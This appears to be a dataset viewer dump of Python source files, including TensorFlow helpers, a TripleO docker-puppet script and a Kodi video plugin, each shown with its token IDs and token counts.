Dataset schema (value ranges across all rows):

    content            stringlengths   1 to 1.05M
    input_ids          listlengths     1 to 883k
    ratio_char_token   float64         1 to 22.9
    token_count        int64           1 to 883k
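The two derived columns follow mechanically from the first two: `token_count` is the length of `input_ids`, and `ratio_char_token` is `len(content) / token_count` (characters per token). Below is a minimal sketch of how one row could be built. The GPT-2 BPE tokenizer is an assumption — the visible IDs look consistent with its vocabulary (e.g. 198 for a newline, 11748 for `import`), but the dump does not name the tokenizer — and `make_row` is a hypothetical helper, not part of the dataset tooling.

```python
# Sketch: build one dataset row from raw source text.
# Assumption: GPT-2 BPE tokenizer -- not confirmed by the dump.
from transformers import GPT2TokenizerFast

tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")


def make_row(content: str) -> dict:
    """Hypothetical helper producing the four columns shown above."""
    input_ids = tokenizer(content)["input_ids"]
    token_count = len(input_ids)
    return {
        "content": content,
        "input_ids": input_ids,
        "ratio_char_token": len(content) / token_count,  # chars per token
        "token_count": token_count,
    }


row = make_row("import os\nimport sys\n")
print(row["token_count"], round(row["ratio_char_token"], 6))
```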
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import os

import numpy as np

from unittest import TestCase

from core.feature_extraction.galaxy.galaxy_processor import GalaxyProcessor
from commons.helpers.dataset.strategies.galaxy_dataset.label_strategy import GalaxyDataSetLabelStrategy
from commons.helpers.dataset.context import Context
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 28686, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 198, 6738, 4755, 13...
3.149533
107
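A row like the one above (107 tokens, ratio 3.149533) can be spot-checked by decoding `input_ids` back into `content` and recomputing the two statistics. This sketch continues the GPT-2 assumption and the hypothetical row shape from the previous example:

```python
import math


def check_row(row: dict, tokenizer) -> None:
    """Spot-check one row: ids must decode back to content, and the
    stored statistics must be self-consistent with it."""
    assert tokenizer.decode(row["input_ids"]) == row["content"]
    assert row["token_count"] == len(row["input_ids"])
    assert math.isclose(
        row["ratio_char_token"],
        len(row["content"]) / row["token_count"],
        rel_tol=1e-5,  # the viewer rounds to ~7 significant digits
    )
```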
from django.conf import settings
from django.core.management import call_command
from django.core.management.base import BaseCommand
from os import path
[ 6738, 42625, 14208, 13, 10414, 1330, 6460, 198, 6738, 42625, 14208, 13, 7295, 13, 27604, 1330, 869, 62, 21812, 198, 6738, 42625, 14208, 13, 7295, 13, 27604, 13, 8692, 1330, 7308, 21575, 198, 6738, 28686, 1330, 3108, 628 ]
4.052632
38
"""Registry utilities to handle formats for gmso Topology.""" SaversRegistry = Registry() LoadersRegistry = Registry()
[ 37811, 8081, 4592, 20081, 284, 5412, 17519, 329, 308, 76, 568, 5849, 1435, 526, 15931, 628, 628, 198, 50, 30400, 8081, 4592, 796, 33432, 3419, 198, 8912, 364, 8081, 4592, 796, 33432, 3419, 628, 198 ]
3.571429
35
dosyaadi = input("Enter file name: ")
dosyaadi = str(dosyaadi + ".txt")

with open(dosyaadi, 'r') as file:
    dosyaicerigi = file.read()

silinecek = str(input("Enter the text that you wish to delete: "))
dosyaicerigi = dosyaicerigi.replace(silinecek, '')

with open(dosyaadi, 'w') as file:
    file.write(dosyaicerigi)
    # the redundant file.close() was dropped; the with-block closes the file

print("-" * 30)
print("Successfully deleted!")
print("-" * 30)
[ 37427, 3972, 9189, 796, 5128, 7203, 17469, 2393, 1438, 25, 366, 8, 201, 198, 37427, 3972, 9189, 796, 965, 7, 37427, 3972, 9189, 1343, 27071, 14116, 4943, 201, 198, 201, 198, 4480, 1280, 7, 37427, 3972, 9189, 11, 705, 81, 11537, 355, ...
2.497006
167
import tensorflow as tf


class CustomModelCheckpoint(tf.keras.callbacks.ModelCheckpoint):
    pass  # body omitted in this row


class CustomEarlyStopping(tf.keras.callbacks.EarlyStopping):
    pass  # body omitted in this row


def get_losses():
    losses = [tf.keras.losses.BinaryCrossentropy()]
    return losses


def get_metrics(single_output_idx, add_normal=False):
    metrics = []
    if single_output_idx is None:  # Multi-label
        print("###### Multi-label classification ######")
        # The BinaryAccuracy_* metrics are defined elsewhere in the original file
        metrics += [
            BinaryAccuracy_Infiltrates,
            BinaryAccuracy_Pneumonia,
            BinaryAccuracy_Covid19
        ]
        # Add normal class
        if add_normal:
            metrics.append(BinaryAccuracy_Normal)
    else:
        print(f"###### Multi-class classification (cls: '{single_output_idx}') ######")
        metrics = [
            tf.keras.metrics.BinaryAccuracy(),
            tf.keras.metrics.AUC(),
            tf.keras.metrics.Precision(),
            tf.keras.metrics.Recall()
        ]
    return metrics


def get_model(backbone, classes=None, target_size=None, freeze_base_model=True, ignore_model=None):
    istrainable = not freeze_base_model

    # Select backbone
    if backbone == "resnet50":
        from tensorflow.keras.applications.resnet import ResNet50 as TFModel
        from tensorflow.keras.applications.resnet import preprocess_input
    elif backbone == "resnet50v2":
        from tensorflow.keras.applications.resnet_v2 import ResNet50V2 as TFModel
        from tensorflow.keras.applications.resnet_v2 import preprocess_input
    elif backbone == "resnet101v2":
        from tensorflow.keras.applications.resnet_v2 import ResNet101V2 as TFModel
        from tensorflow.keras.applications.resnet_v2 import preprocess_input
    elif backbone == "vgg16":
        from tensorflow.keras.applications.vgg16 import VGG16 as TFModel
        from tensorflow.keras.applications.vgg16 import preprocess_input
    elif backbone == "efficientnetb0":
        from tensorflow.keras.applications.efficientnet import EfficientNetB0 as TFModel
        from tensorflow.keras.applications.efficientnet import preprocess_input
    elif backbone == "efficientnetb7":
        from tensorflow.keras.applications.efficientnet import EfficientNetB7 as TFModel
        from tensorflow.keras.applications.efficientnet import preprocess_input
    else:
        raise ValueError(f"Unknown backbone: {backbone}")

    if ignore_model:
        model = None
    else:
        # Instantiate base model with pre-trained weights
        base_model = TFModel(input_shape=(*target_size, 3), include_top=False, weights="imagenet")

        # Freeze base model
        # base_model.trainable = istrainable
        for layers in base_model.layers:
            layers.trainable = istrainable

        # Create a new model on top
        inputs = base_model.input
        x = base_model(inputs)

        # Option A
        x = tf.keras.layers.GlobalAveragePooling2D(name='avg_pool')(x)

        # Option B
        # x = tf.keras.layers.Flatten(name='flatten')(x)
        # x = tf.keras.layers.Dense(512, activation='relu', name='fc1')(x)
        # x = tf.keras.layers.Dense(512, activation='relu', name='fc2')(x)

        # Outputs
        outputs = tf.keras.layers.Dense(classes, activation="sigmoid", name='predictions')(x)

        model = tf.keras.Model(inputs, outputs)
    return model, preprocess_input


def add_tabular_input(model, classes):
    # Input1
    input1 = model.input
    input2 = tf.keras.layers.Input(shape=(2,), name="input_2b")

    # Pre-outputs 1x3 + 1x3
    output1 = model.output
    output2 = tf.keras.layers.Dense(classes, activation="sigmoid", name='output_tab')(input2)

    # Outputs
    x = tf.keras.layers.Concatenate(axis=1)([output1, output2])
    output = tf.keras.layers.Dense(classes, activation="sigmoid", name='final_predictions')(x)

    model = tf.keras.Model([input1, input2], output)
    return model


def unfreeze_base_model(model, n=None, unfreeze=True):
    base_model = model.layers[1].layers

    # Select number of layers to unfreeze
    idx = 0
    if n is not None:
        if isinstance(n, int):
            idx = n
            print(f"Unfreezing {len(base_model) - idx} layers")
        elif isinstance(n, float) and 0.0 < n <= 1.0:
            idx = int(len(base_model) * n)
            print(f"Unfreezing {idx} layers")
        else:
            raise ValueError("Invalid number of layers")

    # We unfreeze all layers but BatchNorm (to not destroy the non-trainable weights)
    for layer in base_model[-idx:]:
        if not isinstance(layer, tf.keras.layers.BatchNormalization):
            layer.trainable = True
[ 11748, 11192, 273, 11125, 355, 48700, 628, 628, 628, 198, 4871, 8562, 17633, 9787, 4122, 7, 27110, 13, 6122, 292, 13, 13345, 10146, 13, 17633, 9787, 4122, 2599, 628, 198, 4871, 8562, 20457, 1273, 33307, 7, 27110, 13, 6122, 292, 13, 13...
2.365493
1,959
import re
import json
import time
import sys

import httplib2
from twitter import *
import magic


if __name__ == '__main__':
    for i in range(1, len(sys.argv)):
        tw = TwitterMediaDL()
        for tweetID in tw.get_medias(sys.argv[i]):
            list_url = tw.get_image_url(tweetID)
            for j in range(0, len(list_url)):
                raw = tw.http_wrapper(list_url[j])
                ext = tw.get_file_extension(raw)
                with open('{:d}_{:d}.{:s}'.format(tweetID, j, ext), 'wb') as f:
                    f.write(raw)
[ 11748, 302, 198, 11748, 33918, 198, 11748, 640, 198, 11748, 25064, 198, 198, 11748, 1841, 489, 571, 17, 198, 6738, 17044, 1330, 1635, 198, 11748, 5536, 628, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 198, 220, 220, ...
1.944056
286
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops for evaluation metrics and summary statistics.

See the @{$python/contrib.metrics} guide.

@@streaming_accuracy
@@streaming_mean
@@streaming_recall
@@streaming_recall_at_thresholds
@@streaming_precision
@@streaming_precision_at_thresholds
@@streaming_auc
@@streaming_curve_points
@@streaming_recall_at_k
@@streaming_mean_absolute_error
@@streaming_mean_iou
@@streaming_mean_relative_error
@@streaming_mean_squared_error
@@streaming_mean_tensor
@@streaming_root_mean_squared_error
@@streaming_covariance
@@streaming_pearson_correlation
@@streaming_mean_cosine_distance
@@streaming_percentage_less
@@streaming_sensitivity_at_specificity
@@streaming_sparse_average_precision_at_k
@@streaming_sparse_average_precision_at_top_k
@@streaming_sparse_precision_at_k
@@streaming_sparse_precision_at_top_k
@@streaming_sparse_recall_at_k
@@streaming_specificity_at_sensitivity
@@streaming_concat
@@streaming_false_negatives
@@streaming_false_negatives_at_thresholds
@@streaming_false_positives
@@streaming_false_positives_at_thresholds
@@streaming_true_negatives
@@streaming_true_negatives_at_thresholds
@@streaming_true_positives
@@streaming_true_positives_at_thresholds
@@auc_using_histogram
@@accuracy
@@aggregate_metrics
@@aggregate_metric_map
@@confusion_matrix
@@set_difference
@@set_intersection
@@set_size
@@set_union
"""

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

# pylint: disable=unused-import,line-too-long,g-importing-member,wildcard-import
from tensorflow.contrib.metrics.python.metrics import *
# pylint: enable=wildcard-import
from tensorflow.contrib.metrics.python.ops.confusion_matrix_ops import confusion_matrix
from tensorflow.contrib.metrics.python.ops.histogram_ops import auc_using_histogram
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metric_map
from tensorflow.contrib.metrics.python.ops.metric_ops import aggregate_metrics
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_accuracy
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_auc
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_concat
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_covariance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_curve_points
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_false_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_absolute_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_cosine_distance
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_iou
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_relative_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_mean_tensor
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_pearson_correlation
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_percentage_less
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_precision_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_recall_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_root_mean_squared_error
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sensitivity_at_specificity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_average_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_precision_at_top_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_sparse_recall_at_k
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_specificity_at_sensitivity
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_negatives_at_thresholds
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives
from tensorflow.contrib.metrics.python.ops.metric_ops import streaming_true_positives_at_thresholds
from tensorflow.contrib.metrics.python.ops.set_ops import set_difference
from tensorflow.contrib.metrics.python.ops.set_ops import set_intersection
from tensorflow.contrib.metrics.python.ops.set_ops import set_size
from tensorflow.contrib.metrics.python.ops.set_ops import set_union
# pylint: enable=unused-import,line-too-long

from tensorflow.python.util.all_util import remove_undocumented

remove_undocumented(__name__)
[ 2, 15069, 1584, 383, 309, 22854, 37535, 46665, 13, 1439, 6923, 33876, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, ...
3.11744
1,984
#!/usr/bin/env python
# -*- coding: utf-8 -*-

###############################################################################
#  Copyright 2013 Kitware Inc.
#
#  Licensed under the Apache License, Version 2.0 ( the "License" );
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
###############################################################################

import datetime

from .model_base import AccessControlledModel,\
    ValidationException,\
    AccessException
from girder.constants import AccessType
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 29113, 29113, 7804, 4242, 21017, 198, 2, 220, 15069, 2211, 10897, 1574, 3457, 13, 198, 2, 198, 2, 220, 49962, 73...
3.958159
239
#!/usr/bin/env python
#
#   Licensed under the Apache License, Version 2.0 (the "License"); you may
#   not use this file except in compliance with the License. You may obtain
#   a copy of the License at
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
#   Unless required by applicable law or agreed to in writing, software
#   distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#   WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#   License for the specific language governing permissions and limitations
#   under the License.

# Shell script tool to run puppet inside of the given docker container image.
# Uses the config file at /var/lib/docker-puppet/docker-puppet.json as a source for a JSON
# array of [config_volume, puppet_tags, manifest, config_image, [volumes]] settings
# that can be used to generate config files or run ad-hoc puppet modules
# inside of a container.

import glob
import json
import logging
import os
import subprocess
import sys
import tempfile
import multiprocessing

log = logging.getLogger()
ch = logging.StreamHandler(sys.stdout)
if os.environ.get('DEBUG', False):
    log.setLevel(logging.DEBUG)
    ch.setLevel(logging.DEBUG)
else:
    log.setLevel(logging.INFO)
    ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s %(levelname)s: %(message)s')
ch.setFormatter(formatter)
log.addHandler(ch)

# this is to match what we do in deployed-server
process_count = int(os.environ.get('PROCESS_COUNT',
                                   multiprocessing.cpu_count()))

log.info('Running docker-puppet')
config_file = os.environ.get('CONFIG', '/var/lib/docker-puppet/docker-puppet.json')
log.debug('CONFIG: %s' % config_file)
with open(config_file) as f:
    json_data = json.load(f)

# To save time we support configuring 'shared' services at the same
# time. For example configuring all of the heat services
# in a single container pass makes sense and will save some time.
# To support this we merge shared settings together here.
#
# We key off of config_volume as this should be the same for a
# given group of services. We are also now specifying the container
# in which the services should be configured. This should match
# in all instances where the volume name is also the same.

configs = {}

for service in (json_data or []):
    if service is None:
        continue
    if isinstance(service, dict):
        service = [
            service.get('config_volume'),
            service.get('puppet_tags'),
            service.get('step_config'),
            service.get('config_image'),
            service.get('volumes', []),
        ]
    config_volume = service[0] or ''
    puppet_tags = service[1] or ''
    manifest = service[2] or ''
    config_image = service[3] or ''
    volumes = service[4] if len(service) > 4 else []

    if not manifest or not config_image:
        continue

    log.info('config_volume %s' % config_volume)
    log.info('puppet_tags %s' % puppet_tags)
    log.info('manifest %s' % manifest)
    log.info('config_image %s' % config_image)
    log.info('volumes %s' % volumes)
    # We key off of config volume for all configs.
    if config_volume in configs:
        # Append puppet tags and manifest.
        log.info("Existing service, appending puppet tags and manifest")
        if puppet_tags:
            configs[config_volume][1] = '%s,%s' % (configs[config_volume][1],
                                                   puppet_tags)
        if manifest:
            configs[config_volume][2] = '%s\n%s' % (configs[config_volume][2],
                                                    manifest)
        if configs[config_volume][3] != config_image:
            log.warn("Config containers do not match even though"
                     " shared volumes are the same!")
    else:
        log.info("Adding new service")
        configs[config_volume] = service

log.info('Service compilation completed.')

# Holds all the information for each process to consume.
# Instead of starting them all linearly we run them using a process
# pool. This creates a list of arguments for the above function
# to consume.
process_map = []

for config_volume in configs:
    service = configs[config_volume]
    puppet_tags = service[1] or ''
    manifest = service[2] or ''
    config_image = service[3] or ''
    volumes = service[4] if len(service) > 4 else []

    if puppet_tags:
        puppet_tags = "file,file_line,concat,augeas,%s" % puppet_tags
    else:
        puppet_tags = "file,file_line,concat,augeas"

    process_map.append([config_volume, puppet_tags, manifest, config_image,
                        volumes])

for p in process_map:
    log.debug('- %s' % p)

# Fire off processes to perform each configuration. Defaults
# to the number of CPUs on the system.
# mp_puppet_config (like match_config_volume and get_config_hash below) is
# defined elsewhere in the original script.
p = multiprocessing.Pool(process_count)
returncodes = list(p.map(mp_puppet_config, process_map))
config_volumes = [pm[0] for pm in process_map]
success = True
for returncode, config_volume in zip(returncodes, config_volumes):
    if returncode != 0:
        log.error('ERROR configuring %s' % config_volume)
        success = False

# Update the startup configs with the config hash we generated above
config_volume_prefix = os.environ.get('CONFIG_VOLUME_PREFIX', '/var/lib/config-data')
log.debug('CONFIG_VOLUME_PREFIX: %s' % config_volume_prefix)
startup_configs = os.environ.get('STARTUP_CONFIG_PATTERN', '/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
log.debug('STARTUP_CONFIG_PATTERN: %s' % startup_configs)
infiles = glob.glob('/var/lib/tripleo-config/docker-container-startup-config-step_*.json')
for infile in infiles:
    with open(infile) as f:
        infile_data = json.load(f)

    for k, v in infile_data.iteritems():
        config_volume = match_config_volume(config_volume_prefix, v)
        if config_volume:
            config_hash = get_config_hash(config_volume_prefix, config_volume)
            if config_hash:
                env = v.get('environment', [])
                env.append("TRIPLEO_CONFIG_HASH=%s" % config_hash)
                log.debug("Updating config hash for %s, config_volume=%s hash=%s" % (k, config_volume, config_hash))
                infile_data[k]['environment'] = env

    outfile = os.path.join(os.path.dirname(infile), "hashed-" + os.path.basename(infile))
    with open(outfile, 'w') as out_f:
        json.dump(infile_data, out_f)

if not success:
    sys.exit(1)
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 2, 198, 2, 220, 220, 220, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 345, 743, 198, 2, 220, 220, 220, 407, 779, 428, 2393, 2845, 287, 1184...
2.619935
2,468
# -*- coding: utf-8 -*-

import sys
import urllib
import urlparse

# import xbmc
import xbmcgui
import xbmcplugin

import aci

# Get the plugin url in plugin:// notation.
_url = sys.argv[0]
# Get the plugin handle as an integer number.
_handle = int(sys.argv[1])

# Get an instance of ACI.
ATV = aci.ACI()
ATV.load_aci()

# Encode user agent headers for video.
user_agent_headers = urllib.urlencode({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 '
                                                     'Firefox/47.0 FirePHP/0.7.4',
                                       'X-Requested-With': 'ShockwaveFlash/22.0.0.192'
                                       })


def get_url(**kwargs):
    """
    Create a URL for calling the plugin recursively from the given set of keyword arguments.

    :param kwargs: "argument=value" pairs
    :type kwargs: dict
    :return: plugin call URL
    :rtype: str
    """
    return '{0}?{1}'.format(_url, urllib.urlencode(kwargs))


def get_categories():
    """
    Get the list of video categories.

    Here you can insert some parsing code that retrieves
    the list of video categories (e.g. 'Movies', 'TV-shows', 'Documentaries' etc.)
    from some site or server.

    .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
        instead of returning lists.

    :return: The list of video categories
    :rtype: types.GeneratorType
    """
    return ATV.aci.iterkeys()


def get_videos(category):
    """
    Get the list of video files/streams.

    Here you can insert some parsing code that retrieves
    the list of video streams in the given category from some site or server.

    .. note:: Consider using `generator functions <https://wiki.python.org/moin/Generators>`_
        instead of returning lists.

    :param category: Category name
    :type category: str
    :return: the list of videos in the category
    :rtype: list
    """
    return ATV.aci[category]


def list_categories():
    """
    Create the list of video categories in the Kodi interface.
    """
    # Set plugin category. It is displayed in some skins as the name
    # of the current section.
    xbmcplugin.setPluginCategory(_handle, 'ACI')
    # Set plugin content. It allows Kodi to select appropriate views
    # for this type of content.
    xbmcplugin.setContent(_handle, 'videos')
    # Get video categories
    categories = get_categories()
    # Iterate through categories
    for category in categories:
        # xbmc.log(category.encode("utf-8"), xbmc.LOGNOTICE)
        # Create a list item with a text label and a thumbnail image.
        list_item = xbmcgui.ListItem(label=category.title())
        # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
        # Here we use the same image for all items for simplicity's sake.
        # In a real-life plugin you need to set each image accordingly.
        list_item.setArt({'thumb': "icon.png",
                          'icon': "icon.png",
                          'fanart': "icon.png"})
        # Set additional info for the list item.
        # Here we use a category name for both properties for simplicity's sake.
        # setInfo allows to set various information for an item.
        # For available properties see the following link:
        # https://codedocs.xyz/xbmc/xbmc/group__python__xbmcgui__listitem.html#ga0b71166869bda87ad744942888fb5f14
        # 'mediatype' is needed for a skin to display info for this ListItem correctly.
        list_item.setInfo('video', {'title': category.title(),
                                    'genre': category.title(),
                                    'mediatype': 'video'})
        # Create a URL for a plugin recursive call.
        # Example: plugin://plugin.video.example/?action=listing&category=[category name]
        url = get_url(action="listing", category=category)
        # is_folder = True means that this item opens a sub-list of lower level items.
        is_folder = True
        # Add our item to the Kodi virtual folder listing.
        xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
    # Add a sort method for the virtual folder items (alphabetically, ignore articles)
    xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
    # Finish creating a virtual folder.
    xbmcplugin.endOfDirectory(_handle)


def list_videos(category):
    """
    Create the list of playable videos in the Kodi interface.

    :param category: Category name
    :type category: str
    """
    # Set plugin category. It is displayed in some skins as the name
    # of the current section.
    xbmcplugin.setPluginCategory(_handle, category)
    # Set plugin content. It allows Kodi to select appropriate views
    # for this type of content.
    xbmcplugin.setContent(_handle, 'videos')
    # Get the list of videos in the category.
    videos = get_videos(category)
    # Iterate through each video.
    for video_id in videos:
        # Get the video item to process.
        video_item = videos[video_id]
        # Create a list item with a text label and a thumbnail image.
        list_item = xbmcgui.ListItem(label=video_item["title"])
        # Set additional info for the list item.
        # 'mediatype' is needed for skin to display info for this ListItem correctly.
        list_item.setInfo('video', {'title': video_item["title"],
                                    'genre': category.title(),
                                    'mediatype': 'video'})
        # Set graphics (thumbnail, fanart, banner, poster, landscape etc.) for the list item.
        # Here we use the same image for all items for simplicity's sake.
        # In a real-life plugin you need to set each image accordingly.
        list_item.setArt({'thumb': video_item["thumbnail"],
                          'icon': video_item["thumbnail"],
                          'fanart': video_item["thumbnail"]
                          })
        # Set 'IsPlayable' property to 'true'.
        # This is mandatory for playable items!
        list_item.setProperty('IsPlayable', 'true')
        referer_header = urllib.urlencode({"Referer": video_item["location"]})
        video_item['url'] += '|%s&amp;%s' % (user_agent_headers, referer_header)
        # Create a URL for a plugin recursive call.
        # Example: plugin://plugin.video.example/?action=play&video=[video url]
        url = get_url(action='play', video=video_item['url'])
        # video_url = 'plugin://plugin.video.f4mTester/?url=' + urllib.quote_plus(video['video']) + \
        #             '&amp;streamtype=HLSRETRY&name=' + urllib.quote_plus(video['name']) + \
        #             '&amp;|User-Agent=Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 ' \
        #             'FirePHP/0.7.4&amp;X-Requested-With=ShockwaveFlash/22.0.0.192&amp;Referer=' + \
        #             urllib.quote_plus(video['reference'])
        # url = get_url(action='play', video=video_url)
        # Add the list item to a virtual Kodi folder.
        # is_folder = False means that this item won't open any sub-list.
        is_folder = False
        # Add our item to the Kodi virtual folder listing.
        xbmcplugin.addDirectoryItem(_handle, url, list_item, is_folder)
    # Add a sort method for the virtual folder items (alphabetically, ignore articles)
    xbmcplugin.addSortMethod(_handle, xbmcplugin.SORT_METHOD_LABEL_IGNORE_THE)
    # Finish creating a virtual folder.
    xbmcplugin.endOfDirectory(_handle)


def play_video(path):
    """
    Play a video by the provided path.

    :param path: Fully-qualified video URL
    :type path: str
    """
    # Create a playable item with a path to play.
    play_item = xbmcgui.ListItem(path=path)
    # Play with inputstream addon.
    play_item.setProperty('inputstreamaddon', 'inputstream.adaptive')
    play_item.setProperty('inputstream.adaptive.manifest_type', 'hls')
    # Pass the item to the Kodi player.
    xbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)


def router(paramstring):
    """
    Router function that calls other functions
    depending on the provided paramstring

    :param paramstring: URL encoded plugin paramstring
    :type paramstring: str
    """
    # Parse a URL-encoded paramstring to the dictionary of
    # {<parameter>: <value>} elements
    params = dict(urlparse.parse_qsl(paramstring))
    # Check the parameters passed to the plugin
    if params:
        if params['action'] == 'listing':
            # Load the videos for aci.
            if params['category'] == "shows":
                ATV.update_aci_shows()
                print("Updated from main shows.")
            elif params['category'] == "cable":
                ATV.update_aci_cable()
                print("Updated from main cable.")
            elif params['category'] == "movies":
                ATV.update_aci_movies()
                print("Updated from main movies.")
            # Display the list of videos in a provided category.
            list_videos(params['category'])
        elif params['action'] == 'play':
            # Play a video from a provided URL.
            play_video(params['video'])
        else:
            # If the provided paramstring does not contain a supported action
            # we raise an exception. This helps to catch coding errors,
            # e.g. typos in action names.
            raise ValueError('Invalid paramstring: {0}!'.format(paramstring))
    else:
        # Load ATV.
        ATV.load_aci()
        # If the plugin is called from Kodi UI without any parameters,
        # display the list of video categories
        list_categories()


if __name__ == '__main__':
    # Call the router function and pass the plugin call parameters to it.
    # We use string slicing to trim the leading '?' from the plugin call paramstring
    router(sys.argv[2][1:])
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 25064, 198, 11748, 2956, 297, 571, 198, 11748, 19016, 29572, 198, 198, 2, 1330, 2124, 20475, 66, 198, 11748, 2124, 20475, 66, 48317, 198, 11748, 2124, 20475, ...
2.496006
4,006
# Copyright (c) 2020, Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can be
# found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause

import logging

from coremltools.converters.mil.input_types import (
    InputType,
    TensorType,
    ImageType,
    RangeDim,
    _get_shaping_class,
)
from coremltools.converters.mil.input_types import Shape as InputShape
from coremltools.converters.mil.mil.var import Var
from coremltools.converters.mil.mil import get_new_symbol
from coremltools.converters.mil.mil.types.symbolic import is_symbolic
from coremltools.converters.mil.mil.types import is_tensor
from coremltools.converters.mil.mil import types

from .basic_graph_ops import topsort, simple_topsort
from .convert_utils import convert_graph

from coremltools.converters.mil.mil import Builder as mb
from coremltools.converters.mil.mil import Program
from coremltools.converters.mil.mil import Function
from .ssa_passes.tf_passes import tensorflow_passes
from coremltools.converters._profile_utils import _profile

# TranscriptionContext maintains a map of tf_node.name --> ssa_var available
# to the current TF --> tfssa transcription.
[ 2, 220, 15069, 357, 66, 8, 12131, 11, 4196, 3457, 13, 1439, 2489, 10395, 13, 198, 2, 198, 2, 220, 5765, 286, 428, 2723, 2438, 318, 21825, 416, 257, 347, 10305, 12, 18, 12, 565, 682, 5964, 326, 460, 307, 198, 2, 220, 1043, 287, ...
2.992665
409
#!/usr/bin/env python

# Copyright (c) 2016 Clay Wells
#
# A Python-based link checker.
#
# Usage: pylinkcheck.py -r https://www.example.com
#
# By default, we can spider and check all of the links found at the URL's
# domain. For example, a check of https://foo.example.com will only check
# links with the base URL path of foo.example.com. Links found to
# bar.example.com will not be checked.
#
# Fancy run-time options
#   url root (domain): this is simply required
#   generate report file: -o output.txt, --output=output.txt
#   limit depth: -l 2, --limit=2
#   TODO: report format: --format=txt,html,xml
##############################################################################

import argparse
import urllib2
import csv
from datetime import datetime
import re
from urlparse import urlparse
from bs4 import BeautifulSoup

#######################################
# Functions
#
# Spider the base URL
# Print an informative summary of the dead links
